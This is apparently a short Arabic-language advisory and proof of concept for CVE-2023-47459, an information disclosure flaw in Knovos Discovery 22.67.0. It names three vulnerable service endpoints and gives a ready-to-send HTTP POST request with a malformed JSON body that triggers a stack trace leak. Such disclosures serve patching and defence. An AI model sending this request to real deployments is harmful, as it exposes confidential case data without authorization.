
إثبات مفهوم لاستغلال CVE-2023-47459، وهي ثغرة كشف معلومات في Knovos Discovery v22.67.0، توضح الوصول عن بعد إلى البيانات السرية عبر طلبات HTTP مصممة.
تم اكتشاف ثغرة أمنية في Knovos Discovery الإصدار 22.67.0 تسمح لمهاجم عن بُعد بالوصول إلى معلومات سرية باستخدام المكوّنات التالية:
/DiscoveryReview/Service/CaseManagement.svc/GetProductSiteName و /DiscoveryReview/Service/WorkProduct.svc/BindRelatedDocumentsInformation و /DiscoveryProcess/Service/Admin.svc/getReviewIdForReport.
تتبّع مكدس الاستدعاءات / كشف المعلومات
Knovos Discovery
الإصدار 22.67.0 - الإصدار 22.67.0
/DiscoveryReview/Service/CaseManagement.svc/GetProductSiteName /DiscoveryReview/Service/WorkProduct.svc/BindRelatedDocumentsInformation /DiscoveryProcess/Service/Admin.svc/getReviewIdForReport
عن بُعد
true
true
مستخدم مُصرَّح له
POST /DiscoveryReview/Service/WorkProduct.svc/BindRelatedDocumentsInformation HTTP/1.1
Host: vuln_host
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Content-Type: application/json; charset=utf-8
X-Requested-With: XMLHttpRequest
Content-Length: 17
Connection: close
{
"Id": id
}